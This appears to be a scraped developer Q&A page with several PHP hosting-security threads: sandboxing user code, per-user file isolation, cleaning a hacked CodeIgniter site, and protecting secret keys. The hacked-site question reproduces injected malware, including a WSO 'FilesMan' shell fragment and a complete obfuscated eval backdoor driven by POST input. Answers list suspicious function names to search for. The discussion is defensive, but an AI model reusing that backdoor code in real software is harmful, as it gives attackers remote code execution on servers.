User Permission in PHP - php
I'm working on an online-platform that allows to write PHP code on a textarea
and see that code on an iframe.
Why? because i want to release API for another platform so that users
can try them without problems
With this platform users can create/edit/delete files.
Every user has a personal folder that contains his own files, the folder's name is equal to the username of the user.
My problem is that I don't want a user to edit files of other users, but only his own.
How can i do this?
If a user writes the code that refers to the folder of another user,
//for example
f_open('../path_to_differt_dir');
this user could delete all the files belonging to the other user.
How can I avoid this?
I wish that ONLY the functions written by me can change file, instead the functions created by the user, however, does not have permission to change anyone file.
That way I could control all this, But I don't know how to do something like this.
If I understand you - you are building an "online" PHP compiler.
Well you have bigger concerns than just relative path.
The best way to approach that will be to use a PHP sandbox class that will enable you to avoid unsafe code.
Here is a nice project (the best I know of): A full-scale PHP 5.3.2+ sandbox class that utilizes PHP-Parser to prevent sandboxed code from running unsafe code.
When doing it like that you can whitelist the functions you want and black list others - this way you can leave out exec, shell_exec ...
For relative path issues you can always create a virtual host for the userfolder when the folder is created and box him with basedir:
<VirtualHost 178.154.120.143:80>
<Directory /httpdocs/user/userfolder>
php_admin_value open_basedir "C:/httpdocs/user/userfolder"
</Directory>
</VirtualHost>
The problem here is that you will need to flush the changes which will normally require a server restart. But there are solutions for that too:
configure virtualhost without restarting apache web server
I Hope it helps.
Related
Codeigniter application getting hacked, code injected in index.php
I have a codeigniter 2.0.2 project that keeps getting hacked. There are two main issues: Malicious code is being added to the start of the index.php file Rogue files are added to the server According to the host there are no FTP logs to indicate these files were uploaded. As there are no FTP upload logs related to the rogue files - does this mean it must be an exploit via the site itself e.g. a contact or upload form? The site is on shared hosting - code it be a site on the same server is also getting hacked and this is causing the problems? Would it help if I change the filename of index.php to something else? As the index.php is getting modified should I CHMOD it to 644? I've been looking for what the suggested permissions are for codeigniter projects but not sourced any yet. I was thinking 644 across the site apart from the upload/logs directory (777) - does this sound okay? Code injected to the top of the index.php file: <?php if(isset($_GET["t6371n"])){ $auth_pass="";$color="#df5";$default_action="FilesMan";$default_use_ajax=true;$default_charset="Windows- which is then followed by a long preg_replace statement with a long encoded string. This is followed by a second statement: if(isset($_GET["w6914t"])){$d=substr(8,1);foreach(array(36,112,61,64,36,95,80,79,83,84,91,39,112,49,39,93,59,36,109,61,115,112,114,105,110,116,102,40,34,37,99,34,44,57,50,41,59,105,102,40,115,116,114,112,111,115,40,36,112,44,34,36,109,36,109,34,41,41,123,36,112,61,115,116,114,105,112,115,108,97,115,104,101,115,40,36,112,41,59,125,111,98,95,115,116,97,114,116,40,41,59,101,118,97,108,40,36,112,41,59,36,116,101,109,112,61,34,100,111,99,117,109,101,110,116,46,103,101,116,69,108,101,109,101,110,116,66,121,73,100,40,39,80,104,112,79,117,116,112,117,116,39,41,46,115,116,121,108,101,46,100,105,115,112,108,97,121,61,39,39,59,100,111,99,117,109,101,110,116,46,103,101,116,69,108,101,109,101,110,116,66,121,73,100,40,39,80,104,112,79,117,116,112,117,116,39,41,46,105,110,110,101,114,72,84,77,76,61,39,34,46,97,100,100,99,115,108,97,115,104,101,115,40,104,116,109,108,115,112,101,99,105,97,108,99,104,97,114,115,40,111,98,95,103,101,116,95,99,108,101,97,110,40,41,41,44,34,92,110,92,114,92,116,92,92,39,92,48,34,41,46,34,39,59,92,110,34,59,101,99,104,111,40,115,116,114,108,101,110,40,36,116,101,109,112,41,46,34,92,110,34,46,36,116,101,109,112,41,59,101,120,105,116,59)as$c){$d.=sprintf((substr(urlencode(print_r(array(),1)),5,1).c),$c);}eval($d);} There is a contact form and a form where a user can upload items using CKFinder 2.0.1. Going to update this and see if that resolves it.
There's a couple of things you can do: Check your logfiles for POST requests to files with weird or unfamiliar names, e.g. .cache_123.php - these could be backdoor scripts, especially filenames starting with a dot, thus hiding it from the (regular) filesystem. Download the complete live site and do a site-wide search for things such as base64_decode, exec, preg_replace, passthru, system, shell_exec, eval, FilesMan Have your entire (downloaded live) site checked by running it through anti-virus software (AVG, Avast, ...) Chmod upload directories 775 instead of 777 if possible
I know this is an old thread, but I'd like to add an option to figure out what and where the problem is occurring. Create a hook which loads each time (doesn't matter at which stage) and dump the $this->input->post() and ->get() to a log file together with the classname and method name. This way you will see quick enough where the problem started.
I think is far easier to hack through a PHP app rather than an FTP server. Do you have any upload forms ? If you can't go with a VPS, try asking your host to move it to another shared server.
I think you really need to perform a code audit to find where the core vulnerability lies. Unless you run some sort of integrity checks you can't be sure if attacker has put backdoor in other files. As a quick fix, I would suggest you to install ModSecurity Apache module if possible. Next, look for places in code where file injection could occur (usually file upload functions).
How to Restrict PHP's File Access to DOCUMENT_ROOT
Is it possible to restrict PHP's file access to its document root? Basically on my work's server we have our domains in a file structure like: /home/something/domains/domain1/ /home/something/domains/domain2/ /home/something/domains/domain3/ Right now, any script on domain1 has read and write access to anything in /home/something/domains/ including all of our other domains. I would like to restrict file access for a script in domain1 to only that domain. The server is hosted with mediatemple and it is their grid service, so I don't have root access or even vhost config access. We can change php.ini, and i know it offers open_basedir, but it doesn't sound like that solves my problem as I could only restrict file access to /domians/ and not the individual domains. Any help appreciated. What I'm really trying to do: This server was recently hacked, and the hackers were overwriting domains/.htaccess which affected all our sites. We have tons of sites and many of them have lots of lines of bad code. They uploaded WSO, a hacking backdoor/shell which gave them full access to everything. I don't know how they got access, I guess it was either from the timthumb exploit, one of the millions of lines of bad code, or they just got our FTP password somehow. We updated old timthumbs, changed the password and removed all the bad files we found, but since there is a decent chance whatever exploit they found is still on the server, or that we missed some backdoor, I would at least like to limit their access to the actual domain that contains the exploit or unfound backdoor.
My initial thought was to set open_basedir for each of the virtual hosts (even if you have to ask your host admin to do it for you), but I am doubtful that will even work because I am fairly certain external/shell commands that run in PHP/scripts will still work on directories outside of the designated tree. After more consideration, the closest way to configure your setup and get what you want, that I could think of, would be to set up chroot-jailed user accounts for each vhost and have your webserver use those user accounts through a mechanism like the Apache 2 MPM ITK, which I can only assume your hosting provider will have trouble setting up.
PHP application to replicate websites from single code source
I'm attempting to build an application in PHP to help me configure new websites. New sites will always be based on a specific "codebase", containing all necessary web files. I want my PHP script to copy those web files from one domain's webspace to another domain's webspace. When I click a button, an empty webspace is populated with files from another domain. Both domains are on the same Linux/Apache server. As an experiment, I tried using shell and exec commands in PHP to perform actions as "root". (I know this can open major security holes, so it's not my ideal method.) But I still had similar permission issues and couldn't get that method to work either. But I'm running into permission/ownership issues when copying across domains. Maybe a CGI script is a better idea, but I'm not sure how to approach it. Any advice is appreciated. Or, if you know of a better resource for this type of information, please point me toward it. I'm sure this sort of "website setup" application has been built before. Thanks!
i'm also doing something like this. Only difference is that i'm not making copies of the core files. the system has one core and only specific files are copied. if you want to copy files then you have to take in consideration the following: an easy (less secured way) is to use the same user for all websites otherwise (in case you want to provide different accesses) - you must create a different owner for each website. you must set the owner/group for the copied files (this will be done by root). for the new website setup: either main domain will run as root, and then it will be able to execute a new website creation, or if you dont want your main domain to be root, you can do the following: create a cronjob (or php script that runs in a loop under CLI), that will be executed by root. it will check some database record every 2 minutes for example, and you can add from your main domain a record with setup info for new hosted website (or just execute some script that gains root access and does it without cron). the script that creates this can be done in php. it can be done in any language you wish, it doesn't really matter as long as it gets the correct access. in my case i'm using the same user since they are all my websites. disadvantage is that OS won't create restrictions, my php code will (i'm losing the advantage of users/groups permissions between different websites). notice that open_basedir can cause you some hassle, make sure you exclude correct paths (or disable it). also, there are some minor differences between fastCGI and suPHP (i believe it won't cause you too much trouble).
deny access to certain folder using php
Is it possible to "deny from all" apache htaccess style using php. I can't use htaccess because im using different webserver, so i wan't to use php to workaround it. So let say user are trying to access folder name 'david', all content and subdirectory are denied from viewing.
No PHP cannot be used to protect folders. Because it is not PHP who serves requests, but a web server You can move this catalog above Document Root to prevent web access to it. But premissions will help you nothing
Use chmod to change the permissions on that directory. Note that the user running PHP needs to own it in that case.
If you just want to prevent indexing the folder, you can create an index.php file that does a simple redirection. Note: Requests that have a valid filename will still be let through. <?php header("Location: /"); // redirect user to root directory
Without cooperation from the webserver the only way to protect your files is to encrypt them, in an archive, maybe, of which your script would know the password and tell no one - that will end up wasting cpu as the server will be decrypting it all the time, or to use an incredibly deranged file naming scheme, a file naming scheme you won't ever describe to anyone, and that only your php script can sort trough. Still data could be downloaded, bandwidth go to waste and encrypted files decrypted. It all depends on how much that data matters. And how much your time costs, as these convoluted layers of somewhat penetrable obfuscation will likely eat huge chunks of developer time. Now, as I said... that would be without cooperation from the webserver... but what if the webserver is cooperating and doesn't know? I've seen some apache webservers, (can anyone confirm it's in the standard distribution?) for instance, come preloaded with a rule denying access to files starting with .ht, not only .htaccess but everything similar: .htproxy, .htcache, .htwhatever_comes_to_mind, .htyourmama... Chances are your server could be one of those. If that's the case... rename your hidden files .hthidden-<filename1>,.hthidden-<filename2>... and you'll get access to them only through php file functions, like readfile()
Storing important secret keys in php files
We're making an app using PHP and using some third party services that require a secret API key. We have a PHP file that contains all those keys definitions that we then import (using require_once) when needed. Is this approach safe? Should we store the keys in a different place? Thank you.
Something similar was asked today for a shell script. The answer is valid here as well: Make sure you store the file outside the web root, or (if that's not possible) protect it using a .htaccess file. I also like to unset() any variables containing sensitive data after use, so not even a full variable dump (e.g. in a debug message) later in that script could reveal it.
It should be relatively safe as long as the file is not accessible from the web. A lot of sites will place sensitive files outside of the webroot on the server, and simply include them when needed into their app.
I always set the permissions of certificates and other files containing sensitive data such that only my development team and the apache service can access the file. This is important if you are using a server shared by a large organization, like a university, where lots of people might have permissions to the file by default. Often I've seen read permissions given to everyone so that the web server can access the file(since it is neither the owner nor in the group permission for the file, the only thing left is to give read to "other"). Instead, I ensure there is a group containing only my development team, and set the read/write permissions for the file to that group. I then use ACL to add a read permission for the APACHE service. You have to use an ACL since the owner and group are normally set to a developer and development team group, leaving you no options for setting access for apache other than using ACL.
Security by obfuscation: create own namespace with function to encode, decode add auto_prepend_file in php.ini to /usr/share/nginx/outsidehtml/keystorage/83738489384828838227.php run nginx or apache in chroot,selinux disable listing permission to keystorage folder setfacl -m user:nginx:x /usr/share/nginx/outsidehtml/keystorage/ add php.ini disable_class = ReflectionFunction disable_function = opcache_get_status,phpinfo,show_source,ini_get For better harding you can store key in php.ini as value i.e 123key = secret64 TEST print_r(glob('/usr/share/nginx/outsidehtml/keystorage/*.*'));